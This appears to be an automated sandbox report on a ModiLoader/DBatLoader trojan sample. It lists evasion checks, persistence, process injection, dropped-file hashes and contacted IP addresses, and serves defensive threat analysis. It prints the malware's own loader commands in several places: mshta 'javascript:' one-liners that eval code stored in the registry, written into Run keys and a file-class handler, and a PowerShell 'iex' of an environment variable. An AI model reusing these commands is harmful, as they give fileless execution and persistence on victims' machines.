Malware Analysis Report

2024-08-06 14:34

Sample ID 240529-11zwqsbf5w
Target 821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118
SHA256 6b959a28b0588409d90e02999113bd442cae3298bad61947d19ccd0787e97736
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6b959a28b0588409d90e02999113bd442cae3298bad61947d19ccd0787e97736

Threat Level: Known bad

The file 821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

Process spawned unexpected child process

ModiLoader, DBatLoader

Looks for VirtualBox drivers on disk

Looks for VirtualBox Guest Additions in registry

ModiLoader Second Stage

Checks for common network interception software

Looks for VMWare Tools registry key

Drops startup file

Checks BIOS information in registry

Deletes itself

Maps connected drives based on registry

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Modifies registry class

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Virtualization/Sandbox Evasion
T1497
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
Software Discovery
T1518
Query Registry
T1012
Virtualization/Sandbox Evasion
T1497
File and Directory Discovery
T1083
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-05-29 22:07

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-29 22:07

Reported

2024-05-29 22:10

Platform

win7-20240508-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\94d0f9.lnk C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\7358d4\\e5ae70.lnk\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:CTuP3WwXE=\"E3dS\";ON51=new%20ActiveXObject(\"WScript.Shell\");yG6AaqF=\"Bqn07tEe7P\";WN1b2i=ON51.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\bfow\\\\niegp\");HB9U4EYuxQ=\"tif5F8k\";eval(WN1b2i);hgKZTY1d=\"z0FUa9FYiS\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:yvPQdz5=\"u6W37k\";G9h=new%20ActiveXObject(\"WScript.Shell\");s9wgXmvL=\"HjCiBk\";GbE56c=G9h.RegRead(\"HKCU\\\\software\\\\bfow\\\\niegp\");WiwqjSWh6=\"zyVWE8rTX\";eval(GbE56c);HbMcl3Ut1v=\"ZLpelf5Ik6\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2764 set thread context of 756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 756 set thread context of 872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.1879f4f\ = "2070de" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open\command C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open\command\ = "mshta \"javascript:kP4tH1gV=\"pSiBNCdh\";z6X=new ActiveXObject(\"WScript.Shell\");QF8SiQ2O=\"zzcZs\";z0JTv2=z6X.RegRead(\"HKCU\\\\software\\\\bfow\\\\niegp\");nRHIzdf2=\"A5cPTi4\";eval(z0JTv2);CT4ywsegt=\"T\";\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.1879f4f C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2724 wrote to memory of 2764 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2764 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2764 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2764 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2764 wrote to memory of 756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2764 wrote to memory of 756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2764 wrote to memory of 756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2764 wrote to memory of 756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2764 wrote to memory of 756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2764 wrote to memory of 756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2764 wrote to memory of 756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2764 wrote to memory of 756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 756 wrote to memory of 872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 756 wrote to memory of 872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 756 wrote to memory of 872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 756 wrote to memory of 872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 756 wrote to memory of 872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 756 wrote to memory of 872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 756 wrote to memory of 872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 756 wrote to memory of 872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:BAp0P5bD="Y3xX";B4E=new%20ActiveXObject("WScript.Shell");tN9RBav1="0";qbM9m=B4E.RegRead("HKLM\\software\\Wow6432Node\\dzCxnE\\nX53dQDNdz");emmirl1vD="4hoqDuYy8W";eval(qbM9m);Gs3Q3OHT="hdekCOFs";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:xnptzdx

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
N/A 10.47.119.64:80 tcp
ZA 196.8.28.53:80 tcp
CO 186.82.32.27:80 tcp
CN 115.149.183.38:80 tcp
US 35.124.9.90:80 tcp
CL 152.172.250.149:80 tcp
US 67.63.180.79:8080 tcp
US 67.118.54.214:8080 tcp
US 48.99.233.161:80 tcp
FR 176.145.87.137:8080 tcp
US 30.199.73.252:80 tcp
US 139.104.185.201:80 tcp
US 70.11.128.174:80 tcp
NO 152.90.199.220:80 tcp
US 128.150.15.53:80 tcp
US 26.27.95.176:80 tcp
N/A 10.239.189.224:80 tcp
FI 135.181.209.151:80 tcp
GB 136.225.83.44:80 tcp
RU 217.171.152.88:80 tcp
ES 84.89.20.77:80 tcp
US 215.251.188.206:80 tcp
CA 99.221.172.48:80 tcp
US 56.118.45.188:80 tcp
US 69.128.139.9:80 tcp
AT 80.120.96.28:80 tcp
US 66.151.149.23:80 tcp
JP 58.183.44.192:443 tcp
NO 134.47.152.39:80 tcp
AE 91.72.252.192:80 tcp
SG 115.66.219.28:80 tcp
US 173.49.30.18:443 tcp
US 56.90.14.145:80 tcp
TW 1.160.193.5:80 tcp
AU 124.170.27.31:80 tcp
US 50.150.117.50:80 tcp
CN 161.189.48.110:80 tcp
US 137.200.241.75:80 tcp
CA 153.53.79.59:80 tcp
JP 158.215.106.18:80 tcp
US 38.206.177.217:8080 tcp
JP 126.84.220.34:80 tcp
DZ 105.102.205.233:80 tcp
US 24.153.235.253:80 tcp
DE 91.67.205.214:80 tcp
US 158.151.137.252:80 tcp
US 166.235.207.97:80 tcp
GB 31.93.194.219:443 tcp
US 55.252.136.17:80 tcp
TR 88.237.181.13:80 tcp
IN 59.99.77.77:443 tcp
PL 213.17.156.12:80 tcp
DE 84.160.17.43:80 tcp
US 214.57.119.167:80 tcp
US 70.21.93.162:80 tcp
ZA 197.68.220.233:80 tcp
US 7.110.141.203:80 tcp
IT 84.221.90.195:443 tcp
CA 96.21.79.249:443 tcp
CA 205.195.34.157:80 tcp
MX 201.123.111.3:8080 tcp
NL 89.99.126.234:80 tcp
TW 123.241.223.86:80 tcp
TW 120.114.103.88:80 tcp
BR 181.77.246.230:80 tcp
US 48.246.238.195:80 tcp
JP 34.85.106.149:80 tcp
US 64.158.97.255:80 tcp
US 96.76.50.150:80 tcp
IT 93.61.151.6:80 tcp
US 67.251.118.174:8080 tcp
GB 132.153.154.223:80 tcp
US 172.74.124.16:80 tcp
US 67.254.214.142:80 tcp
TW 223.140.125.188:80 tcp
HN 190.99.21.66:80 tcp
US 11.181.54.22:80 tcp
US 98.19.116.200:8080 tcp
US 21.150.27.100:80 tcp
US 135.38.70.222:80 tcp
CO 45.173.69.144:80 tcp
US 40.19.99.34:80 tcp
IT 5.88.106.48:80 tcp
BR 200.244.22.11:80 tcp
US 162.166.217.225:80 tcp
US 205.90.150.49:80 tcp
US 23.19.30.200:80 tcp
GB 158.125.74.128:80 tcp
GB 82.34.80.187:80 tcp
FR 80.13.49.85:80 tcp
CL 146.83.233.9:80 tcp
IN 117.219.116.3:80 tcp
CH 185.125.24.143:80 tcp
US 76.19.199.36:8080 tcp
KR 220.72.253.179:80 tcp
GB 195.99.15.196:80 tcp
CN 219.232.150.35:80 tcp
NG 105.121.151.217:80 tcp
SE 176.71.152.55:80 tcp
AU 203.206.192.171:80 tcp
US 64.193.143.246:80 tcp
US 55.57.22.246:80 tcp
CN 59.50.147.156:80 tcp
BR 179.92.209.67:8080 tcp
JP 221.96.145.174:443 tcp
US 47.202.220.138:80 tcp
US 19.26.34.13:80 tcp
US 165.245.219.31:80 tcp
IR 92.42.53.119:80 tcp
CN 121.47.218.75:80 tcp
SA 100.210.38.184:80 tcp
TW 220.141.126.240:80 tcp
FR 217.180.183.219:80 tcp
US 164.117.134.103:80 tcp
US 3.146.77.134:80 tcp
BR 179.104.167.164:80 tcp
US 204.162.32.204:80 tcp
US 128.221.213.155:80 tcp
US 18.24.104.166:80 tcp
AT 140.78.181.160:80 tcp
US 20.191.109.80:80 tcp
US 167.145.92.28:80 tcp
US 23.32.135.56:80 tcp
US 3.150.10.252:443 tcp
JP 114.152.234.105:80 tcp
DE 51.221.174.109:80 tcp
DE 84.141.132.71:80 tcp
ES 90.77.222.233:443 tcp
CN 120.48.224.240:80 tcp
US 156.134.89.108:80 tcp
AR 190.182.200.227:80 tcp
KR 221.158.13.109:80 tcp
US 23.54.144.119:80 tcp
DE 84.136.37.123:80 tcp
US 216.23.238.240:80 tcp
CN 222.42.13.114:80 tcp

Files

memory/1704-0-0x0000000000400000-0x000000000046C000-memory.dmp

memory/1704-1-0x0000000000530000-0x000000000056A000-memory.dmp

memory/1704-2-0x0000000000400000-0x000000000046C000-memory.dmp

memory/1704-4-0x00000000020F0000-0x00000000021C4000-memory.dmp

memory/1704-5-0x00000000020F0000-0x00000000021C4000-memory.dmp

memory/1704-3-0x00000000020F0000-0x00000000021C4000-memory.dmp

memory/1704-6-0x00000000020F0000-0x00000000021C4000-memory.dmp

memory/1704-8-0x00000000020F0000-0x00000000021C4000-memory.dmp

memory/1704-7-0x00000000020F0000-0x00000000021C4000-memory.dmp

memory/1704-9-0x00000000020F0000-0x00000000021C4000-memory.dmp

memory/2764-19-0x0000000006170000-0x0000000006244000-memory.dmp

memory/756-20-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-21-0x0000000000230000-0x000000000036E000-memory.dmp

memory/2764-23-0x0000000006170000-0x0000000006244000-memory.dmp

memory/756-24-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-38-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-45-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-46-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-44-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-43-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-42-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-41-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-40-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-39-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-37-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-36-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-35-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-34-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-33-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-54-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-57-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-63-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-55-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-53-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-52-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-51-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-32-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-31-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-30-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-29-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-28-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-27-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-26-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-25-0x0000000000230000-0x000000000036E000-memory.dmp

memory/872-64-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-65-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-77-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-66-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-67-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-68-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-81-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-82-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-80-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-79-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-78-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-76-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-75-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-74-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-73-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-72-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-71-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-70-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-69-0x0000000000130000-0x000000000026E000-memory.dmp

C:\Users\Admin\AppData\Local\7358d4\6d45a7.bat

MD5 14adc766d85da95cd0990ed6bcc1524d
SHA1 e3c8f83a8fbfea658c9139d3e670d609745fb848
SHA256 0245cf83462c2d8f2453beb1094af0133caee498c1ab5147ee361cb8a449c1c4
SHA512 b4172624d668b6c1e7519cca9cbb53645ecc8b9aa1e4908801fd81983b092ed7ad26e3e29047ff5dc4e7744ee9f08dc61765133fa5957926cb4518127f4b60b8

C:\Users\Admin\AppData\Roaming\e53183\8858ab.1879f4f

MD5 2a880d9ffacfb5a03bdcb409c2c9c78a
SHA1 c8bb1f79016573f9618c9452bdc5df405d3659d0
SHA256 cff123dab9320d1db27beb544dbbbf9fd24c23eb0df61d5212ddae57c6664b52
SHA512 dfee891287091599766fb8901d217c9fae1e5c0028e85718f7df3bb1462ebabd11c964d9ad5de1b898aef87479e4be0add9cbfddc856fabf4a689912c5df1020

C:\Users\Admin\AppData\Local\7358d4\e5ae70.lnk

MD5 7298e0387167c3dcd091b6d81b7669a7
SHA1 4373f5798221909986bc1216c68be0e91e5abeb2
SHA256 9b4174d31d8f2b1d55a7f73af3401ce6a5d14026b73065e98d7f3e4484d7463d
SHA512 6b3648468794a9a5d0cf7f4d2451a82fde239e59843dc25b0fd8c25a962f6451cb9f1ffd40aff16ed6f941c52dea4e3d511a79878c5a55c5e53f81db8a078cea

C:\Users\Admin\AppData\Local\7358d4\2d9c5e.1879f4f

MD5 cb5eadf560dc3b5aa149c7107893a8f7
SHA1 bddd7c974ce2c32ffaa7a1234791edafc16defd4
SHA256 1b0147420e2a24cccdc3836648fa3a67fcc5138fffd463a915886a280b4a35d7
SHA512 f517d8b296a6af3c2aac9b84a0e30a159de585673a65623a8b6f975ae29b8de8461f4b6df1150665c703f9e75af088a6452de11120f7f617363f8fb9f2f39550

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\94d0f9.lnk

MD5 aa54e39149e392ed22125d1706f23fbc
SHA1 07533595a10fa8e129c01f0be80d17d370c3912a
SHA256 8c868e591e57a9616847f102c647e16f06fdb6d107b0a5540a37a6352e9775dd
SHA512 28f13c1cb6981313f1dc8de57db38734903939780d02ce14dc14673eaa918e7f458989eed29fbf364008c9f0943ceceae2a0190be406068c5fa5e9289bdb9aaa

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-29 22:07

Reported

2024-05-29 22:10

Platform

win10v2004-20240226-en

Max time kernel

10s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
